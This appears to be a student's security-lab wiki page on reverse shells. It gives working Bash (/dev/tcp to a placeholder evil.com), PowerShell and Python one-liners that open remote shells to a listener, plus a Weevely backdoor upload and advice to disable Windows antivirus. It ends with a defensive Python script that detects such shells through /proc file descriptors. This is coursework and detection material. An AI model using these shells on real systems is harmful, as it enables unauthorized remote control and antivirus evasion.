Lab 8.2 Reverse Shells - 5huckle/OFFICIALTECHJOURNAL GitHub Wiki
Bash Reverse Shell
Source: Here
Step 1: Start a listener on the host box, in this case Kali
nc -nlvp 4449
Step 2: Connect back to your host box from the target server. The host name and port below (evil.com, 8080) are placeholders carried over from the source; use the IP and port of the listener started in Step 1
$ exec 5<>/dev/tcp/evil.com/8080
$ cat <&5 | while read line; do $line 2>&5 >&5; done
Step 3: On your host box, type a few commands underneath the listener. They should execute on the target box and return their output to your host box
Wireshark Traffic
Follow the TCP stream of a packet between the target and host box; because nc carries the session without encryption, the commands and their output are visible in cleartext in the stream
Reverse Shell Pippin
Using Weevely (here's a reference), generate a Weevely backdoor and upload it to the target server via FTP
ftp -i 10.0.5.25
Windows Reverse Shell
Something that I have come to learn about Windows is that the firewall denies first, asks questions later. To be able to do this one-liner, you need to turn off Windows Antivirus (AV). You do this through Windows Security
Windows Reverse Shell One-Liner (for CMD.exe)
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.17.135',4449); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Replace the IP and port in the TCPClient call with those of your listener (cmd.exe does not treat # as a comment, so keep any note off the command line itself)
Python Reverse Shell
Python is capable of using one-liners to open a reverse shell on servers and connect back to an nc listening port.
Check which version, if any, of python is available on the target
which python
If this yields no positive results, try python3 or python2 in place of python. You may need to update the interpreter name in the one-liner accordingly.
Python3 One-Liner Reverse Shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.17.105",4449));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' # copy and paste this into the target box AFTER running 'nc -nlvp 4449', replace the 10.0.17.105 and 4449 with appropriate IP and Port
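From the defender's side, both the Bash and Python one-liners above leave the same footprint on the target: a shell whose standard streams (or, for the Bash variant, fd 5) are a TCP socket. The following is an added example, not part of the original lab, that hunts for that footprint by reading /proc/<pid>/fd on Linux; the process names it treats as suspicious and the sample fd table are my own assumptions, constructed for the demonstration.

```python
# Flag reverse-shell-style processes on Linux by reading /proc/<pid>/fd: the Python
# one-liner dup2()s the socket onto fds 0-2 and the Bash one opens it as fd 5, and a
# socket fd's symlink under /proc always reads "socket:[inode]".
import os
import re

SHELLS = {"sh", "bash", "dash", "zsh", "ash"}          # assumed list, extend as needed
INTERPRETERS = SHELLS | {"python", "python2", "python3", "perl"}
_SOCKET_RE = re.compile(r"^socket:\[\d+\]$")

def classify(pid, comm, fd_targets):
    """Return (pid, comm, reason, socket_fds) if suspicious, else None.
    fd_targets maps fd number -> readlink() target of /proc/<pid>/fd/<fd>."""
    sock_fds = tuple(sorted(fd for fd, t in fd_targets.items() if _SOCKET_RE.match(t)))
    if not sock_fds:
        return None
    if comm in INTERPRETERS and any(fd in (0, 1, 2) for fd in sock_fds):
        return (pid, comm, "stdio attached to a socket", sock_fds)
    if comm in SHELLS:  # an interactive shell normally holds no sockets; /dev/tcp does
        return (pid, comm, "shell holding a socket fd", sock_fds)
    return None

def read_proc_fd_table(proc="/proc"):
    """Build {pid: (comm, {fd: target})} from a live Linux host (root sees every pid)."""
    table = {}
    for name in os.listdir(proc):
        if not name.isdigit():
            continue
        try:
            with open(f"{proc}/{name}/comm") as f:
                comm = f.read().strip()
            fd_dir = f"{proc}/{name}/fd"
            fds = {int(fd): os.readlink(f"{fd_dir}/{fd}") for fd in os.listdir(fd_dir)}
        except (OSError, ValueError):
            continue  # process exited, or its fds are not readable without privilege
        table[int(name)] = (comm, fds)
    return table

def hunt(table):
    """Apply classify() to every process in a table; returns the list of hits."""
    return [h for pid, (comm, fds) in table.items() if (h := classify(pid, comm, fds))]

# Constructed sample (not captured from a real host): 1234 mirrors the Python
# one-liner's child bash, 1235 the Bash /dev/tcp variant, 1236 and 1237 are benign.
SAMPLE = {
    1234: ("bash", {0: "socket:[51234]", 1: "socket:[51234]", 2: "socket:[51234]"}),
    1235: ("bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0", 5: "socket:[51300]"}),
    1236: ("nginx", {0: "/dev/null", 1: "/dev/null", 2: "/dev/null", 6: "socket:[777]"}),
    1237: ("bash", {0: "/dev/pts/2", 1: "/dev/pts/2", 2: "/dev/pts/2"}),
}

if __name__ == "__main__":
    print(*hunt(SAMPLE), sep="\n")  # swap SAMPLE for read_proc_fd_table() on a live host
```

Run it against read_proc_fd_table() on the target box after Step 2 and the shell spawned by either one-liner shows up; the same fd check works from an EDR or osquery-style collector.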